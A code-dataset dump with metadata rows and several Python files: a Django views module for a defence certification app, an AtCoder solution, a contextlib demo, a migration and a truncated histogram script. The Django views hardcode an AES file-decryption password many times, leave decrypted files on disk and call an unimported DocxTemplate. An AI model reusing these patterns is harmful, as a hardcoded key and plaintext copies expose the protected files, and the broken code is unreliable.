blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
adbd9301b5bda91c278b06fb2830f00b52df2ea7 | a3c970cb385cb4c6e2122b3c096f61ceb37b3acd | /defence/.history/dashboard/do_views_20191211183052.py | 90e0aa9f0297d160ed8d425b8692c054943d6df7 | [] | no_license | kirubasuba/certa | ec7cd06352ff9c477236afcead89daf9a28943bc | 111f2bdfd2626475951f5f86746f04f5fd42ded4 | refs/heads/master | 2022-12-14T03:44:20.207843 | 2020-05-19T12:36:15 | 2020-05-19T12:36:15 | 212,568,163 | 0 | 0 | null | 2022-11-22T04:41:30 | 2019-10-03T11:56:13 | Python | UTF-8 | Python | false | false | 29,600 | py | from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.contrib.auth.models import User,Group
from .forms import UserCreationForm,TAapplicationForm,cemilacUserForm,proforma_A_form,commentsUploadForm
from django.contrib import messages
from common.decorators import role_required
from authmgmt.models import registration
from .models import TAapplicationmodel,proforma_A_model,TAapplicationfiles,statusmodel,commentsmodel,idgenerationmodel
from django.template.loader import get_template
from xhtml2pdf import pisa
from django.http import HttpResponse
from .views import link_callback
import os
from os import stat, remove
import pyAesCrypt
from datetime import datetime
from django.utils import formats
import comtypes.client
import pythoncom
import urllib
from docx import Document
import io
from io import BytesIO,StringIO
# import io.StringIO
from django.core.files import File
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer"])
def process_proforma(request):
reg=TAapplicationmodel.objects.filter(file_in_id=str(request.user.id))
return render(request, 'dealing officer/viewtyperecord.html',{'details':reg,'status':True})
# @login_required(login_url=settings.LOGIN_URL)
# @role_required(allowed_roles=["TA Coordinator"])
# def checklist(request):
# reg=TAapplicationmodel.objects.all()
# return render(request, 'dealing officer/viewtyperecord.html',{'details':reg,'status':True})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["TA Applicant","Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def viewtyperecord(request,id):
print('saiiiiiiiiiiiiiii',id)
# reg=get_object_or_404(registration,id=id)
# taa=TAapplicationmodel.objects.filter(user_id=id).first()
# if request.method == 'POST':
# return render(request, 'dealing officer/newtypeapproval.html', {'form': form,})
# else:
# form = TAapplicationForm(instance=taa)
# template = get_template('applicant/newtypeapprovalpdf.html')
# context= {
# 'firmname':taa.firmname,
# 'addr1':taa.addr1,
# 'addr2':taa.addr2,
# 'tot':taa.tot,
# 'item_name':taa.item_name,
# 'part_no':taa.part_no,
# 'desc':taa.desc,
# 'spec': taa.spec,
# 'dal_mdi':taa.dal_mdi,
# 'bom':taa.bom,
# 'sop_acbs':taa.sop_acbs,
# 'pc': taa.pc,
# 'tre':taa.tre,
# 'otheritems':taa.otheritems
# }
# response = HttpResponse(content_type='application/pdf')
# response['Content-Disposition'] = 'attachment; filename="report.pdf"'
# html = template.render(context)
# pisaStatus = pisa.CreatePDF(
# html, dest=response, link_callback=link_callback)
# if pisaStatus:
# return HttpResponse(response, content_type='application/pdf')
# # if error then show some funy view
# if pisaStatus.err:
# return HttpResponse('We had some errors <pre>' + html + '</pre>')
# return response
# return render(request, 'applicant/newtypeapprovalpdf.html', {'form': form,})
# curr_path=curr_path.replace('/','\\')
# new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# with open(new_path+'TAapplication.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
print(id,'kkk')
idprefix=request.POST['idprefix']
filename=request.POST['filename']
if filename!='':
comment=request.POST['comment']
if filename=="TAapplication.pdf":
tf=TAapplicationfiles.objects.filter(user_id=id,filecategory="TAapplication").first()
tf.comments=comment
tf.save()
pro=proforma_A_model.objects.all()
messages.success(request, 'Comments Successfully Submitted !')
fc=TAapplicationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(fc.idprefix,'kkk')
tafil=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory="TAapplication",refid=fc.idprefix).first()
curr_path = "/"+str(fc.user_id)+"/"+fc.idprefix+"Annexure 1/TAapplication/"
print(tafil,'tafile')
filename='TAapplication.pdf'
url='http://127.0.0.1:8000/media'+urllib.parse.quote(curr_path)+'TAapplication.pdf'
print(tafil.comments,'new')
return render(request, 'dealing officer/pdf viewer.html',{'url':url,'id':id,'filename':filename,'fc':tafil.comments,'idprefix':fc.idprefix})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def draft_ta(request,id):
doc_final_path ='E:/certa-drdo/certa/Draft_TA.docx'
pdf_final_path ='E:/certa-drdo/certa/Draft_TA.pdf'
final_path='E:/certa-drdo/certa/'
if os.path.isfile(pdf_final_path):
with open(pdf_final_path, 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
elif os.path.isfile(doc_final_path):
print('mmmmmmmmmmmmmm')
pythoncom.CoInitialize()
wdFormatPDF = 17
# print(tempfile.gettempdir(),'temp')
in_file = os.path.abspath(doc_final_path)
# out_file = os.path.abspath('D:/cemilac/certa/defence/media/org1.pdf')
word = comtypes.client.CreateObject('Word.Application')
doc = word.Documents.Open(in_file)
doc.SaveAs('E:/certa-drdo/certa/Draft_TA.pdf', FileFormat=wdFormatPDF)
print('nnnnnnnnnnn')
doc.Close()
word.Quit()
with open(final_path+'Draft_TA.pdf', 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
else:
idprefix=request.POST['idprefix']
print(idprefix,'jjjjjjjjjjjj')
curr_path = "/"+str(id)+ "/"+idprefix+"Annexure 7/"
curr_path=curr_path.replace('/','\\')
new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# if os.path.isdir(new_path):
# with open(new_path+'Draft_TA.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
# else:
taa=TAapplicationmodel.objects.filter(user_id=id).first()
# template = get_template('dealing officer/Draft TA pdf.html')
target_file = StringIO()
template = DocxTemplate("E:/certa-drdo/certa/dashboard/templates/dealing officer/template.docx")
context= {
'firmname':taa.firmname,
'addr1':taa.addr1,
'item_name':taa.item_name,
'part_no':taa.part_no
}
html = template.render(context)
doc_io = io.BytesIO() # create a file-like object
template.save("Draft_TA.docx") # save data to file-like object
new_path1 = 'E:\certa-drdo\certa\Draft_TA.docx'
output_path = os.path.join(settings.MEDIA_ROOT) + '/89/result.pdf'
# new_path=new_path.replace('\','//')
taa=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix,refpath='Annexure 4.13').first()
aesurl=taa.filepath
docurl = aesurl[:-4]
print('aesview',aesurl)
print('docurl',docurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(docurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
# curr_path = "/"+str(id)+ "/Annexure 4.13/PC/pc.docx.aes"
# curr_path=curr_path.replace('/','\\')
# new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# templateDoc = Document(new_path1)
templateDoc1 = Document(new_path1)
templateDoc = Document(docurl)
templateDoc1.add_page_break()
for element in templateDoc.element.body:
templateDoc1.element.body.append(element)
templateDoc1.save(new_path1)
print(request.user.id,'kkkkkkkk')
messages.success(request, 'Draft_TA Successfully Prepared, Click again to view the file !')
reg=TAapplicationmodel.objects.filter(file_in_id=str(request.user.id),file_in_name="TCS-DO")
print('reggggggg',reg)
return render(request, 'tcs do/receivedtyperecord.html',{'details':reg,'status':True})
# pisaStatus = pisa.CreatePDF(
# html, dest=response, link_callback=link_callback)
# if pisaStatus:
# return HttpResponse(response, content_type='application/pdf')
# # if error then show some funy view
# if pisaStatus.err:
# return HttpResponse('We had some errors <pre>' + html + '</pre>')
# return response
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def data_sheet(request,id):
idprefix=request.POST['idprefix']
print(idprefix,'jjjjjjjjjjjj')
doc_final_path ='E:/certa-drdo/certa/TA_Datasheet.docx'
final_path ='E:/certa-drdo/certa/'
# finalpath=final_path.replace('/','\\')
pdf_final_path ='E:/certa-drdo/certa/TA_Datasheet.pdf'
if os.path.isfile(pdf_final_path):
with open(pdf_final_path, 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
elif os.path.isfile(doc_final_path):
print('mmmmmmmmmmmmmm')
pythoncom.CoInitialize()
wdFormatPDF = 17
# print(tempfile.gettempdir(),'temp')
in_file = os.path.abspath(doc_final_path)
# out_file = os.path.abspath('D:/cemilac/certa/defence/media/org1.pdf')
word = comtypes.client.CreateObject('Word.Application')
doc = word.Documents.Open(in_file)
doc.SaveAs('E:/certa-drdo/certa/TA_Datasheet.pdf', FileFormat=wdFormatPDF)
print('nnnnnnnnnnn')
doc.Close()
word.Quit()
with open(final_path+'TA_Datasheet.pdf', 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
else:
curr_path = "/"+str(id)+ "/"+idprefix+"Annexure 6/"
curr_path=curr_path.replace('/','\\')
new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# if os.path.isdir(new_path):
# with open(new_path+'TA Datasheet.docx', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
# else:
taa=TAapplicationmodel.objects.filter(user_id=id).first()
# template = get_template('dealing officer/Draft TA pdf.html')
target_file = StringIO()
template = DocxTemplate("E:/certa-drdo/certa/dashboard/templates/dealing officer/DS template.docx")
context= {
'firmname':taa.firmname,
'addr1':taa.addr1,
'item_name':taa.item_name,
'part_no':taa.part_no
}
html = template.render(context)
doc_io = io.BytesIO() # create a file-like object
template.save("TA_Datasheet.docx") # save data to file-like object
new_path1 = 'E:\certa-drdo\certa\TA_Datasheet.docx'
# output_path = os.path.join(settings.MEDIA_ROOT) + '/89/result.pdf'
# new_path=new_path.replace('\','//')
taa=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix,refpath='Annexure 6').first()
aesurl=taa.filepath
docurl = aesurl[:-4]
print('aesview',aesurl)
print('docurl',docurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(docurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
templateDoc1 = Document(new_path1)
templateDoc = Document(docurl)
# templateDoc1.add_page_break()
for element in templateDoc.element.body:
templateDoc1.element.body.append(element)
templateDoc1.save(new_path1)
messages.success(request, 'Data_sheet Successfully Prepared, Click again to view the file !')
reg=TAapplicationmodel.objects.filter(file_in_id=str(request.user.id))
return render(request, 'tcs do/receivedtyperecord.html',{'details':reg,'status':True})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def addproforma(request,id):
idprefix=request.POST['idprefix']
print(idprefix,'kkkkkkkkkk')
fc=TAapplicationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(fc.idprefix,'kkk')
# tafil=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory="TAapplication",refid=fc.idprefix).first()
curr_path = "/"+str(fc.user_id)+ fc.idprefix+"Annexure 3/Proforma_A/"
curr_path=curr_path.replace('/','\\')
new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
if os.path.isdir(new_path):
with open(new_path+'Proforma_A.pdf', 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
else:
print('sai',fc.user_id,fc.idprefix)
form = proforma_A_form(request=fc.user_id,idpre=fc.idprefix)
pro=proforma_A_model.objects.filter(user_id=fc.user_id,idprefix=idprefix).first()
taa=TAapplicationmodel.objects.filter(user_id=fc.user_id,idprefix=idprefix).first()
if pro:
template = get_template('dealing officer/proformapdf.html')
date_joined = datetime.now()
formatted_datetime = date_joined.strftime("%Y-%m-%d")
print(formatted_datetime,'dte')
taf=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory='DAL_MDI',refid=fc.idprefix).first()
dalurl=''
if taf:
aesurl=taf.filepath
if taf.ext=='.pdf':
pdfurl = aesurl[:-4]
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pdfpath = pdfurl[25:]
print(pdfpath,'pppppppppp')
curr_path=pdfpath
dalurl='http://127.0.0.1:8000/media'+curr_path
print(dalurl,'pppp11111pppppp')
taf=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory='BOM',refid=fc.idprefix).first()
bomurl=''
if taf:
aesurl=taf.filepath
if taf.ext=='.pdf':
pdfurl = aesurl[:-4]
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pdfpath = pdfurl[25:]
print(pdfpath,'pppppppppp')
curr_path=pdfpath
bomurl='http://127.0.0.1:8000/media'+curr_path
print(bomurl,'pppp11111pppppp')
taf=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory='Tech_Spec',refid=fc.idprefix).first()
techspecurl=''
if taf:
aesurl=taf.filepath
if taf.ext=='.pdf':
pdfurl = aesurl[:-4]
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pdfpath = pdfurl[25:]
print(pdfpath,'pppppppppp')
curr_path=pdfpath
techspecurl='http://127.0.0.1:8000/media'+curr_path
print(techspecurl,'pppp11111pppppp')
context= {
'firmname':taa.firmname,
'addr1':taa.addr1,
'addr2':taa.addr2,
'item_name':taa.item_name,
'part_no':taa.part_no,
'desc':taa.desc,
'dal_mdi':taa.dal_mdi,
'bom':taa.bom,
'sop_acbs':taa.sop_acbs,
'pc': taa.pc,
'tre':taa.tre,
'otheritems':taa.otheritems,
'dalurl':dalurl,
'bomurl':bomurl,
'techspecurl':techspecurl,
'ta': pro.ta,
'techspec': pro.techspec,
'qts': pro.qts,
'qtr': pro.qtr,
'cd': pro.cd,
'photo': pro.photo,
'feedback': pro.feedback,
'req': pro.req,
'cost': pro.cost,
'quantity': pro.quantity,
'pc': pro.pc,
'tacomments':pro.tacomments,
'datenow':formatted_datetime
}
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="report.pdf"'
html = template.render(context)
pisaStatus = pisa.CreatePDF(
html,dest=response,link_callback=link_callback)
if pisaStatus:
return HttpResponse(response,content_type='application/pdf')
# if error then show some funy view
if pisaStatus.err:
return HttpResponse('We had some errors <pre>' + html + '</pre>')
return response
else:
print(form.errors)
return render(request, 'dealing officer/proforma.html', {'form': form,'id':id,'idprefix':idprefix})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer"])
def generateproformapdf(request):
id=request.POST['id']
idprefix=request.POST['idprefix']
print('saiiiiiiiiiiiiiii',id)
fc=TAapplicationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(fc.idprefix,'kkk')
tafil=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory="TAapplication",refid=fc.idprefix).first()
# return render(request, 'dealing officer/proforma.html')
if request.method=='POST':
# firstname=request.POST['firstname']
# lastname=request.POST['lastname']
# country=request.POST['country']
# subject=request.POST['subject']
# reg=get_object_or_404(registration,id=id)
user=User.objects.get(pk=fc.user_id)
form = proforma_A_form(request.POST,request=fc.user_id,idpre=fc.idprefix)
if form.is_valid():
pro= form.save(commit=False)
pro.user = user
pro.idprefix=fc.idprefix
pro.save()
taapp_form=TAapplicationmodel.objects.filter(user_id=pro.user_id,idprefix=fc.idprefix).first()
print("pro_form",taapp_form.id)
get_taap_id=statusmodel.objects.filter(TAA_id=taapp_form.id).first()
get_taap_id.status='Ready_for_CL'
get_taap_id.Ready_for_CL=datetime.now()
get_taap_id.save()
print("status",get_taap_id)
messages.success(request, 'Proforma_A Successfully Prepared !')
return render(request, 'dealing officer/proforma.html')
# print('firstname',request.POST['firmname'])
# firmname=request.POST['firmname']
# template = get_template('dealing officer/proformapdf.html')
# context= {
# 'desc':request.POST['desc'],
# 'item_name':request.POST['item_name'],
# 'part_no':request.POST['part_no'],
# 'dal_mdi':request.POST['dal_mdi'],
# 'bom':request.POST['bom'],
# 'sop_acbs':request.POST['sop_acbs'],
# 'otheritems':request.POST['otheritems'],
# 'firmname':request.POST['firmname'],
# 'addr1':request.POST['addr1'],
# 'addr2':request.POST['addr2'],
# 'ta': request.POST['ta'],
# 'techspec': request.POST['techspec'],
# 'qts': request.POST['qts'],
# 'qtr': request.POST['qtr'],
# 'cd': request.POST['cd'],
# 'tre': request.POST['tre'],
# 'photo': request.POST['photo'],
# 'feedback': request.POST['feedback'],
# 'req': request.POST['req'],
# 'cost': request.POST['cost'],
# 'quantity': request.POST['quantity'],
# 'pc': request.POST['pc'],
# 'tacomments':request.POST['tacomments']
# }
# response = HttpResponse(content_type='application/pdf')
# response['Content-Disposition'] = 'attachment; filename="report.pdf"'
# html = template.render(context)
# pisaStatus = pisa.CreatePDF(
# html, dest=response, link_callback=link_callback)
# if pisaStatus:
# return HttpResponse(response, content_type='application/pdf')
# # if error then show some funy view
# if pisaStatus.err:
# return HttpResponse('We had some errors <pre>' + html + '</pre>')
# return response
else:
print(form.errors)
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def rowselect(request,id):
form=commentsUploadForm
print('if',id)
idprefix=request.POST['idprefix']
print(idprefix,'idprefix')
taf=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix).order_by('refpath').first()
get_refpath=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix).values('refpath').order_by('refpath')
idg=idgenerationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(get_refpath,'taff')
for anex_name in get_refpath:
anexture_name = anex_name['refpath']
print(anexture_name,'taff')
comments = commentsmodel(name=anexture_name,idprefix=idprefix,user_id=id)
commentsdb=comments.save()
Datadisp=commentsmodel.objects.filter(user_id=id,idprefix=idprefix).order_by('name')
print(Datadisp,'Datadisp')
# return render(request, 'applicant/view_all_doc.html',{'form':form,'details': taf,'idg':idg,'idprefix':idprefix})
# taa=TAapplicationmodel.objects.filter(user_id=id).first()
# taf=TAapplicationfiles.objects.filter(user_id=id).exclude(filecategory="TAapplication")
# return render(request, 'dealing officer/detail view.html',{'taa':taa,'taf':taf,'id':id})
return render(request, 'rd/comments_view_doc.html',{'form':form,'details': Datadisp})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def addcomment(request):
anexture_name=request.POST['name']
comments=request.POST['comments']
responsible=request.POST['responsible']
status=request.POST['status']
idprefix=request.POST['idprefix']
print(idprefix,anexture_name,'idprefix')
print(comments,responsible,status,'details')
role=request.role
date_joined = datetime.now()
formatted_datetime = date_joined.strftime("%Y-%m-%d")
# get_cmd_id=commentsmodel.objects.filter(name=anexture_name,idprefix=idprefix).first()
# get_cmd_id.comments=comments
# get_cmd_id.commented_date=formatted_datetime
# get_cmd_id.commented_by=role
# get_cmd_id.save()
return render(request, 'rd/comments_view_doc.html')
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def pdfviewercopy(request,id):
# curr_path = "/"+str(id)+ "/TAapplication/"
# curr_path=curr_path.replace('/','\\')
# new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# with open(new_path+'TAapplication.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
taa=TAapplicationmodel.objects.filter(user_id=id).first()
taf=TAapplicationfiles.objects.filter(user_id=id).exclude(filecategory="TAapplication")
print('kkkkkkkkkkkkkkkkk')
if request.POST:
aesurl=request.POST['path']
ext=request.POST['ext']
tafnew=TAapplicationfiles.objects.filter(user_id=id,filepath=aesurl,ext=ext).first()
fc=tafnew.comments
print('aesview',aesurl)
pdfurl=''
docurl=''
nameonly=''
if ext=='.pdf':
pdfurl = aesurl[:-3]+'pdf'
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
print(pdfurl,'pdfurl')
pdfpath = pdfurl[25:]
print(pdfpath)
curr_path=pdfpath
url='http://127.0.0.1:8000/media'+curr_path
print(fc,'comments')
return render(request, 'dealing officer/detail view.html',{'url':url,'id':id,'fc':fc,'taa':taa,'taf':taf,'path':aesurl})
elif ext=='docx':
# word to pdf
nameonly=aesurl[:-4]
docurl = aesurl[:-4]+'.docx'
print('aesview',aesurl)
print('nameonly',nameonly)
print('docurl',docurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(docurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pythoncom.CoInitialize()
wdFormatPDF = 17
in_file = os.path.abspath(docurl)
word = comtypes.client.CreateObject('Word.Application')
doc = word.Documents.Open(in_file)
doc.SaveAs(nameonly+'.pdf', FileFormat=wdFormatPDF)
doc.Close()
word.Quit()
pdfurl=nameonly+'.pdf'
print(pdfurl,'pdfurl')
pdfpath = pdfurl[25:]
print(pdfpath)
curr_path=pdfpath
url='http://127.0.0.1:8000/media'+curr_path
print(fc,'comments')
os.remove(docurl)
return render(request, 'dealing officer/detail view.html',{'url':url,'id':id,'fc':fc,'taa':taa,'taf':taf,'path':aesurl})
# with open(nameonly+'.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
# finally:
# os.remove(nameonly+'.pdf')
# os.remove(docurl)
else:
return render(request, 'dealing officer/detail view.html',{'id':id,'taa':taa,'taf':taf})
# os.remove(pdfurl)
# print('asdfasdfasdfasdfasdfds')
| [
"30341216+kirubasuba@users.noreply.github.com"
] | 30341216+kirubasuba@users.noreply.github.com |
b03de72493e2c78c1000ad28f82b270dba2b5ebb | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /Others/soundhound/soundhound2018-summer-qual/c.py | b42363ae9f79c07d25224a6872610f1bc11e50c0 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 797 | py | # -*- coding: utf-8 -*-
def main():
n, m, d = map(int, input().split())
# KeyInsight
# 期待値の線形性
# See:
# https://img.atcoder.jp/soundhound2018-summer-qual/editorial.pdf
# https://mathtrain.jp/expectation
# 気がつけた点
# 愚直解を書き出した
# 隣り合う2項がm - 1通りある
# 解答までのギャップ
# dが0かどうかで場合分け
# 整数のペアを考える
ans = m - 1
if d == 0:
# d = 0: (1, 1), ..., (n, n)のn通り
ans /= n
else:
# d ≠ 0: (1, d + 1), ..., (n -d, n)と(d - 1, 1), ..., (n, n - d)で2 * (n - d)通り
ans *= 2 * (n - d)
ans /= n ** 2
print(ans)
if __name__ == '__main__':
main()
| [
"k.hiro1818@gmail.com"
] | k.hiro1818@gmail.com |
579b09ba8c6ea43f5b254fc7bfcff355538a029b | aa369073fab4f8e13ac27a714fe0d975a5a4a9ed | /algorithms/contextlib/contextlib_decorator.py | e31081404750566ee6b97aecadeb90d4fa43ebe0 | [] | no_license | ramsayleung/python3-module-of-week | 4076599a8b1d8aa5794de5d73e2083555abe9f0c | 54266c7e62025c3816a6987191c40f3bc0fdd97c | refs/heads/master | 2021-06-18T09:07:30.256614 | 2017-06-25T10:14:54 | 2017-06-25T10:14:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | import contextlib
class Context(contextlib.ContextDecorator):
def __init__(self, how_used):
self.how_used = how_used
print('__init__({})'.format(how_used))
def __enter__(self):
print('__enter__({})'.format(self.how_used))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
print('__exit__({})'.format(self.how_used))
@Context('as decorator')
def func(message):
print(message)
print()
with Context('as context manager'):
print('Doing work in the context')
print()
func('Doing work in the wrapped function')
| [
"samrayleung@gmail.com"
] | samrayleung@gmail.com |
234dd1f7bc842aa839543c69dc1229e4cbfc4ef0 | 299e2c985b4a2921b150579955e7c60eee094397 | /news/migrations/0006_auto_20190628_1447.py | 9bd54a81c13dcf49ebf7819d2ee21928410fb2e4 | [
"MIT"
] | permissive | Nigar-mr/News | 48d58fbaab0f2bb8cc717323449d7eba14b94918 | b75b78cc9fa64259f4239b1d456daa5224040ce4 | refs/heads/master | 2020-06-17T15:20:05.411391 | 2019-07-09T08:21:24 | 2019-07-09T08:21:24 | 195,961,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | # Generated by Django 2.2.2 on 2019-06-28 10:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news', '0005_remove_headermodel_dropdown'),
]
operations = [
migrations.AlterField(
model_name='headermodel',
name='image',
field=models.ImageField(upload_to='news/icons/'),
),
]
| [
"nigar-muradli@mail.ru"
] | nigar-muradli@mail.ru |
da9e63f387cfd9e65de7a3e1a42fee0f4b8d78ad | 2ac5a81d48809c8dcfcadd76cdbc47db0849758a | /benchmark/wikipedia/annotate_image.py | 969cd898afdb5268c411c46595167cb0a8175e81 | [] | no_license | vmingchen/mris | 5fbed336c2b37dcbe79ee3cc50197bc26d4b2ffc | dacb37238e95b4474ba40112a09fb62f3c45723a | refs/heads/master | 2020-04-15T05:08:37.982307 | 2013-03-03T23:11:03 | 2013-03-03T23:11:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 681 | py | #!/usr/bin/python
'''
Calculate statistics of file sizes (logarithmic).
'''
import sys
import math
import get_hist
if __name__=="__main__":
if len(sys.argv) != 2:
print "usage: %s infile" % sys.argv[0]
sys.exit(1)
hist = {}
for line in open(sys.argv[1]):
if line[0] == "#":
continue
(size, freq) = line.split()
size = float(size)
if size <= 0:
continue
level = int(math.log(size, 2))
if level in hist:
hist[level] += int(freq);
else:
hist[level] = int(freq)
units = {}
base = 512
